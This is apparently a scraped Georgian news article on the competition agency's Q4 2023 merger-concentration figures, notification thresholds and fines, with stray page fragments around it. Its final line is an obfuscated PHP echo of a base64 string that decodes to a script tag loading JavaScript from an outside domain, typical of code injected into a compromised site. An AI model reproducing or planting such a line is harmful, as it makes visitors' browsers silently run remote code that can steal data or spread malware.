celsiusi
ავერსი საქკაბელი

2023 წლის IV კვარტალში კვარტალში საქართველოში - ეკონომიკური აგენტების 18 138 კონცენტრაცია დარეგისტრირდა. ინფორმაციას კონკურენციისა და მომხმარებლის დაცვის სააგენტოს ავრცელებს.

მათი ცნობით, იდენტიფიცირებული მონაცემების მიხედვით, 18 130 შემთხვევაში რეგისტრირებულ კონცენტრაციებში მონაწილე მხარეების წლიური ბრუნვა, წინასწარი შეტყობინების ვალდებულების წარმოშობისთვის აუცილებელ კრიტერიუმს წლიური ბრუნვის ნაწილში არ აკმაყოფილებდა.

„8 შემთხვევა აკმაყოფილებდა, თუმცა 3 მათგანი კონკურენციის კანონმდებლობით განსაზღვრულ გამონაკლისებში მოექცა, ხოლო 1 შემთხვევა შესაბამისი მარეგულირებელი ორგანოს კომპეტენციას განეკუთვნება. რაც შეეხება დარჩენილ 4 შემთხვევას, იდენტიფიცირებული მონაცემების მიხედვით, სავარაუდოდ, ადგილი ჰქონდა კონცენტრაციის თაობაზე სააგენტოსთვის წინასწარ შეტყობინების ვალდებულებას. შესაბამისად, აღნიშნული ეკონომიკური აგენტების მიმართ სააგენტომ საქმისწარმოება დაიწყო“, - განმარტავენ სააგენტოში.

ინფორმაციისთვის: სააგენტოსათვის წინასწარ სავალდებულო შეტყობინებას ექვემდებარება კონცენტრაცია, თუ მისი მონაწილე პირების ერთობლივი (ჯამური) წლიური ბრუნვა საქართველოს ტერიტორიაზე 20 მილიონ ლარს და ამასთან, კონცენტრაციის მონაწილე მინიმუმ ორი პირიდან თითოეულის წლიური ბრუნვა 5 მილიონ ლარს აღემატება. სააგენტოს გვერდის ავლით კონცენტრაციის განხორციელების შემთხვევაში გათვალისწინებულია ჯარიმა, კომპანიის წინა წლის ბრუნვის 5%-მდე მოცულობით. კონცენტრაციის შესახებ შეტყობინების განხილვის საფასურია 5000 ლარი.

2023 წელს, საქართველოში რეგისტრირებული 40 597 კომპანიის კონცენტრაცია იქნა გადამოწმებული. აღნიშნულ პერიოდში, სააგენტომ 9 კონცენტრაციაზე თანხმობა გასცა.

196
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");